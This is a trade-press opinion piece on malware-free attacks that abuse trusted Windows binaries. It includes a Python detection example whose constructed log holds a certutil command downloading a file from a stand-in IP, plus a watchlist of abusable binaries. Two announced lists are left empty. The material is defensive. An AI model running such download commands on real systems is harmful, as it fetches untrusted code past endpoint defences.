
Andy Swift at Six Degrees debates whether optimising or purchasing offers better protection against a new wave of malware-free attacks
It’s an old threat, reimagined. Just when you thought cyber-security couldn’t get more complex or cyber-criminals more devious, I’m here to tell you that these bad actors have rediscovered a way to circumvent many of our most trusted cyber-security defences and launch attacks without viruses, trojans, or other malware.
Although they’re making headlines now, these malware-free attacks - specifically those making use of Living Off the Land Binaries (LOLBins) and other script-based attack methods - are not new. Their recent resurgence is due to advances in endpoint security that make it more difficult and time-consuming to plant malware. From a broader perspective, it’s part of the war of attrition between IT security teams and cyber-criminals - we strengthen one area, and they look for another vulnerability.
So, how do we fight back? I’ll get to that shortly. First, let’s take a deeper look at how malware-free attacks work. Then we’ll be better placed to launch a counter-attack.
To make use of a LOLBin as part of an attack chain, first an attacker will need an initial foothold within an organisation’s internal infrastructure; this can be done via the usual old favourites - phishing or border device exploitation, for example. But instead of deploying detectable malware for the purposes of remote access or exfiltration, they may turn to pre-existing, trusted binaries already embedded within the operating system to serve these same purposes. This is far harder to detect because the attackers are not using additional tooling or even introducing something new to an environment. Automated protection, such as traditional signature-based antivirus software, won’t help.
Tools such as PowerShell, WMI, wscript.exe and certutil.exe (the list is extensive and ever growing) are all baked into the operating system and all have legitimate functions. But with clever manipulation, these tools can be reused for malicious purposes as well. As an example, one might identify an option in one of these programs intended to get a local file for parsing a configuration; however, that same option could be used to retrieve a malicious file from an untrusted external source. Generally, these methods abuse inherent flexibility, lack of strict input validation, or overly permissive features.
The worst part about this is that these files are often digitally signed with trusted certificates, making detection of their abuse even more problematic.
The frequency of malware-free attacks is likely to rise because they are far simpler to work into existing attack chains, rely on binaries already embedded within the operating system, and are more reliable than a traditional malware-based attack. This, coupled with the difficulty of detecting them and their high success rates, makes them an appealing approach. In fact, many cyber-criminal groups - including state-sponsored organisations - now depend exclusively on malware-free attack methods and do not need to create malware to meet their objectives. All these factors suggest a period of rapid evolution and increasingly sophisticated attacks.
At first glance, therefore, mounting a defence can seem like an impossible task. After all, any tool capable of transferring data in or out of a system (infiltrate or exfiltrate) could have the potential to become a malware-free attack vector. In situations like this - when a new cyber-attack appears or an old one regains momentum - the initial response from many IT and security teams is to see if they can buy a solution to fix the vulnerability and improve their protection: usually a tool, licence, software, or piece of hardware. But spending is not always necessary - or a priority.
That’s why I believe it’s vital to carry out a cost vs risk analysis. Be warned, however, that this approach requires a mindset shift - and perhaps a cultural or departmental shift within an organisation. It means moving from evaluating security tool options to analysing the issues that need fixing and addressing them, potentially with existing tools and processes. But it’s worth the effort, I promise.
I’d start by assessing current tooling and licences - and understanding their limitations in the context of malware-free attacks. This might include:
For many organisations, the preferred malware-free defence strategy involves advanced EDR tools and 24x7 SOC monitoring - technologies that enable experts to monitor behaviour and identify any inconsistencies that warrant further investigation. But this is expensive, and most companies have not carried out a full implementation - producing somewhat patchy coverage. It’s also worth noting that most EDR tooling and other endpoint preventive measures are easy to bypass once an attacker is in the right place with the right permissions.
So, while detection and monitoring are not pointless by any stretch of the imagination, the most significant part of the cost vs risk discussion should ideally focus on prevention and establishing solid foundations.
The best chance of detecting malware-free attacks is through behavioural analysis and system monitoring, so any of these tools, if already in place, can absolutely help. I’d recommend organisations review how they use these tools, as they’re often underutilised or not configured to keep pace with an ever-changing attack landscape.
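As an added illustration of the behavioural monitoring described here, and of the trusted-binary abuse outlined earlier (example code added for this page, not the author’s or Six Degrees’ own tooling), the following Python triages constructed process-creation events: a match on the binary name alone is ignored, and a finding is raised only when the launch shows a behavioural anomaly, such as a remote URL where a local file is expected or a document-handling parent process. The watchlists, field names and sample events are assumptions made for the example.

```python
import json
import re

# Hypothetical watchlists for this example: trusted OS binaries the article names
# as commonly abused, and document-handling applications that a phishing lure would
# typically run under. Real deployments would tune both lists to their environment.
LOLBINS = {"powershell.exe", "wscript.exe", "cscript.exe", "certutil.exe", "wmic.exe"}
DOCUMENT_APPS = {"winword.exe", "excel.exe", "outlook.exe", "acrord32.exe"}
URL_RE = re.compile(r"https?://\S+", re.IGNORECASE)

# Constructed process-creation events (JSON lines, one per process start), not real logs.
SAMPLE_LOG = r"""
{"ts": "2025-03-04T09:12:01Z", "image": "C:\\Windows\\System32\\certutil.exe", "parent_image": "C:\\Windows\\System32\\cmd.exe", "command_line": "certutil.exe -dump C:\\certs\\corp.cer"}
{"ts": "2025-03-04T09:14:22Z", "image": "C:\\Windows\\System32\\certutil.exe", "parent_image": "C:\\Windows\\System32\\cmd.exe", "command_line": "certutil.exe http://198.51.100.7/update.dat C:\\Users\\Public\\update.dat"}
{"ts": "2025-03-04T09:15:40Z", "image": "C:\\Windows\\System32\\wscript.exe", "parent_image": "C:\\Program Files\\Microsoft Office\\root\\Office16\\WINWORD.EXE", "command_line": "wscript.exe C:\\Users\\alice\\AppData\\Local\\Temp\\invoice.js"}
{"ts": "2025-03-04T09:20:05Z", "image": "C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe", "parent_image": "C:\\Windows\\explorer.exe", "command_line": "powershell.exe -File C:\\Scripts\\backup.ps1"}
{"ts": "2025-03-04T09:21:11Z", "image": "C:\\Windows\\System32\\notepad.exe", "parent_image": "C:\\Windows\\explorer.exe", "command_line": "notepad.exe C:\\Users\\alice\\notes.txt"}
"""

def basename(path):
    """Lower-cased file name of a Windows path, so matching ignores directory and case."""
    return path.replace("/", "\\").rsplit("\\", 1)[-1].lower()

def load_events(text):
    """Parse JSON-lines process events, skipping blank lines."""
    return [json.loads(line) for line in text.splitlines() if line.strip()]

def triage(events):
    """Return one finding per LOLBin launch that shows a behavioural red flag."""
    findings = []
    for ev in events:
        image = basename(ev["image"])
        if image not in LOLBINS:
            continue  # a signature-style match on the binary alone is not a finding
        parent = basename(ev["parent_image"])
        reasons = []
        if URL_RE.search(ev["command_line"]):
            reasons.append("trusted binary given a remote URL instead of a local file")
        if parent in DOCUMENT_APPS:
            reasons.append("script host spawned by document handler " + parent)
        if reasons:
            findings.append({"ts": ev["ts"], "image": image, "parent": parent, "reasons": reasons})
    return findings

if __name__ == "__main__":
    for finding in triage(load_events(SAMPLE_LOG)):
        print(finding)
```

Of the five constructed events, only the certutil launch with a URL argument and the wscript launch under WINWORD.EXE produce findings; the legitimate certutil, PowerShell and Notepad launches are left alone.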
The key here, however, is prevention. If your first alert during a malware-free attack is the malicious use of a legitimate binary, you are already too late. But much can be done before that point with little to no investment in new tooling. It’s often a case of hardening existing systems and significantly reducing the opportunity for attackers to gain the footholds they need. This might include:
Malware-free attacks are likely to be even more prevalent in the future because they are harder to detect and easier to launch. In most cases, nothing new is imported into the target IT environment, so there’s no smoking gun. As such, shutting an attack down early in its kill chain can be challenging. Many organisations see costs as a barrier to implementing a defence against malware-free attacks.
However, significant progress can be made simply by reviewing and optimising existing security tools. This means shifting the conversation from what we should buy to what we should fix. That’s because even the most expensive detection tools, such as EDRs and SOCs, cannot compensate for poor security fundamentals.
Andy Swift is Cyber Security Assurance Technical Director at Six Degrees